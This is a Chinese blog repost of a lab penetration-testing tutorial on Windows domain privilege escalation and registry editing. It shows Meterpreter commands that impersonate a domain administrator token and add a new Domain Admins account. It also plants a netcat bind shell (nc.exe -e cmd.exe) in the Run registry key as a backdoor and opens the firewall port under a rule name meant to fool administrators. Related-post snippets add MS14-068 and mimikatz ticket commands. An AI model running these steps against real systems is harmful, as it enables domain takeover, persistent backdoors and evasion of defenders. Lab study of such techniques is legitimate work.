域环境提权、编辑注册表

最新推荐文章于 2024-03-28 22:14:47 发布
最新推荐文章于 2024-03-28 22:14:47 发布
阅读量1k 收藏
点赞数
分类专栏: 渗透测试

Token(令牌),域环境中提权

用户每次登录时,账号绑定临时的token;

访问资源时提交token进行身份验证,类似于web cookie。

Delegate Token:交互会话登录,(例如直接登录、远程桌面登录)

Impersonate Token:非交互登录,(例如访问文件共享)

注意:在域环境中,Delegate Token账号注销后变成Impersonate Token,权限依然有效。所以攻击者一旦获取域管理员的token后,危害极大!

实例:server 2003是域控制器,XP加入到域。

首先使用ms08-067漏洞,获得XP的system权限;

然后在域控制器上访问XP的文件共享(\\192.168.80.44\c$),建立一个administrator用户的Impersonate Token;

meterpreter > load incognito

meterpreter > list_tokens -u

meterpreter > impersonate_token LAB\\Administrator  将自己伪装成LAB Administrator用户 (注意命令中是两个\)

meterpreter > getuid  发现自己现在是域管理员

Server username: LAB\Administrator

meterpreter > execute -f cmd.exe -i -t  获得交互shell,-t(使用当前假冒的token执行程序)

C:\WINDOWS\system32>ipconfig /all  查看XP的DNS服务器,即域控制器的ip地址

meterpreter > add_user coleradmin Coleradmin1! -h 192.168.80.11  添加用户

meterpreter > add_group_user "Domain Admins" coleradmin -h 192.168.80.11  给予域管理员权限

编辑注册表

注册表的渗透测试中的常见用途:修改、添加启动项;窃取存储在注册表中的机密信息;绕过文件型病毒查杀。

实例:编辑注册表,添加nc到系统启动项中,形成后门程序。

meterpreter > upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32  将nc.exe上传到目标主机

meterpreter > reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run  枚举注册表的键值

meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 444 -e cmd.exe'  在当前主键下增加一个nc键值

meterpreter > reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v nc  查看nc键值

在重启之前,首先要设置防火墙允许444端口通过。

meterpreter > execute -f cmd -i -H  最好加上-H参数,不然在目标主机上会弹出cmd窗口

C:\Windows\System32> netsh firewall show opmode  查看防火墙的状态

C:\Windows\System32>netsh firewall add portopening TCP 444 "网络发现(Pub PSD-Out)" ENABLE ALL  添加防火墙的规则允许444端口通过(这里“网络发现(Pub PSD-Out)”是规则名称,这样写是为了迷惑管理员。)

目标主机重启后,在Kali上使用nc连接它,获得shell。

root@kali:~# nc 192.168.80.33 444



作者:Instu
链接:http://www.jianshu.com/p/906832a08a46
來源:简书
著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。
zkwniky
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
内批量分发注册表设置
bujanbusan的专栏
07-25 1004
内批量分发注册表设置黑客防线 05年04月27日 【合作】 作者: 适合读者:网管前置知识:服务器基本操作    内批量分发注册表设置    我想很多网管朋友都遇到过这样一种情况,就是需要在内所有的机器上更改某项注册表设置,但如果一台一台地去修改,那实在是一件效率不高又累
windows server-使用组策略中的首选项更改中计算机注册表
little_startoo的博客
11-14 618
windows server-使用组策略中的首选项更改中计算机注册表
权限提升-Win系统权限提升篇&AD内网控&NetLogon&ADCS&PAC&KDC&CVE漏洞
最新发布
siu~
03-28 1185
1、WIN-内用户到AD控-CVE-2014-6324 2、WIN-内用户到AD控-CVE-2020-1472 3、WIN-内用户到AD控-CVE-2021-42287 4、WIN-内用户到AD控-CVE-2022-26923 章节点: 1、Web权限提升及转移 2、系统权限提升及转移 3、宿主权限提升及转移 4、控权限提升及转移
环境中普通用户安装软件权限的管理和控制
weixin_33947521的博客
01-13 6065
了解活动目录权限的朋友都知道,新建用户都默认在DomainUser组。有朋友提出Domain User组的权限下太小,用户想安装软件都不行。就把普通用户加入了管理员组,但这是非常不安全的。 为了更好的对客户端权限进行管理和控制,推荐的做法是,我们只赋予终端用户Domain User组的权限。但有些需要Local Administrator权限的软件就无法安装和...
注册表提权工具.rar
05-14
因为保密原因经常检查U盘连接,需要清理U盘记录,网上找的清理工具不能清理干净,清理完后USBstor下面还有金士顿等记录在,但无法更改权限,最后在微软官网淘到一个工具可以提权,然后手动清除记录就行,压缩包里有...
修改编辑注册表的方法实现修改盘符
09-16
修改编辑注册表的方法实现修改盘符
windows账户提权 API.zip
01-22
总的来说,这个压缩包中的资源详细介绍了Windows环境下使用API进行账户提权的各种技术和策略,涵盖了从创建高权限进程到修改系统服务和注册表等多方面。这些技术在系统管理和软件开发中有其应用,但滥用可能会导致...
解除注册表限制编辑,解除注册表限制编辑
03-28
解除注册表限制编辑
易语言注册表编辑
08-21
易语言注册表编辑器源码系统结构:添加数据,字节集到十六进制文本,删除键,添加项, ======启动窗口_程序 || ||------_树型框1_即将扩展 || ||------_树型框1_项目被选择 || ||------添加数据 || |
MS14-068AD提权神器
05-24
本地WINDOWS: 1.python.exe ms14-068.py -u user-a-1@dom-a.loc -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.local user-a-1@dom-a.loc位用户 S-1-5-21-557603841-771695929-1514560438-1103 为账号SID dc-a-2003.dom-a.local这机全名 可以通过:1)wmic useraccount where name=”USERNAME” get sid 2)whoami /all 本机可以直接查出自己的SID; 用法国神器破解,需要时最新版本的才支持, 2.mimikatz.exe log "kerberos::ptc TGT_user-a-1@dom-a.loc.ccache" exit TGT_user-a-1@dom-a.loc.ccache指的是第一步所生成的ccache文件。 3. kerberos::ptc TGT_secpulse@secpulse.local.ccache 4.查看: klist net use \\DC2.secpulse.local\admin$ //注:使用IP可能会失败 dir \\DC2.secpulse.local\c$ 看看有木有权限 好运~
ad时间源配置_控制器server2012时间同步NTP配置
weixin_36308872的博客
12-24 3110
一、控配置1.修改注册表,设置控服务器名称2.设置组策略,启动NTP服务器3.策略中设置windows time服务自动启动二、服务端配置(Ntp服务器,客户端将根据这台服务器的时间进行同步)1、微软键+R键,进入“运行”,输入“regedit”,进入注册表2、HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\Param...
Windows系统提权简单总结
Aiwin的博客
07-13 1816
Windows系统提权简单总结
环境提权
qq_44657899的博客
11-09 3687
文章目录NetLogon特权提权漏洞(CVE-2020-1472)复现 NetLogon特权提权漏洞(CVE-2020-1472)复现 简介 CVE-2020-1472是一个windows控中严重的远程权限提升漏洞,攻击者通过NetLogon,建立与控间易受攻击的安全通道时,可利用此漏洞获取管访问权限。 影响版本 Windows Server 2008 R2 for x64-based Systems Service Pack 1 Windows Server 2008 R2 for x64-
Windows提权漏洞CVE-2022-26923分析与复现
C20220511的博客
06-24 3250
当Windows系统的Active Directory证书服务(CS)在上运行时,由于机器账号中的dNSHostName属性不具有唯一性,中普通用户可以将其更改为高权限的控机器账号属性,然后从Active Directory证书服务中获取控机器账户的证书,导致中普通用户权限提升为管理员权限。这一漏洞最早由安全研究员Oliver Lyak发现并公开分析过程和POC,微软在2022年5月的安全更新中对其进行了修补。...
客户机提权获取hash值
sinat_38378265的博客
04-02 515
总步骤: 将mimikatz和14068漏洞放到客户机上,打开cmd输入whoami /all查看SID号,再输入14068py.exe -u test@hack.com -p “123.com” -s SID号 -d dc1.contoso.com获取TGT_kim@contoso.com.ccache,然后输入klist purge清除所有的票据,然后输入mimikatz.exe “kerbe...
ms14-068提权
zz_strive_2012的专栏
06-17 2447
一、利用mimakatz.exe来抓取用户的口令 (1)首先利用ms14-058来提权得到管理员权限 (2)利用mimikatz.exe抓密码 可见抓到的口令。用户zhangsan,口令password1! 二、利用ms14-068提权工具生成伪造的kerberos协议认证证书 dir可见缓存数据: 三、利用mimikatz.exe将证书写入,从而提
CVE-2020-1472 提权
网络安全。
09-16 6145
0x1 工具 这里使用zerologon_tester(https://github.com/SecuraBV/CVE-2020-1472)工具验证漏洞是否存在,使用zerologon(https://github.com/risksense/zerologon)工具复现。 运行set_empty_pw.py脚本需要最新版的impacket(https://github.com/SecureAuthCorp/impacket/commit/64ce46580286b5ab15a4737bddf85201ce
wince注册表编辑
09-29
Wince注册表编辑器是嵌入式操作系统Windows Embedded Compact中的一个工具,用于编辑Wince注册表注册表是Windows操作系统中的一个重要组成部分,它存储着操作系统及其应用程序的配置信息和设置。通过注册表编辑器...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值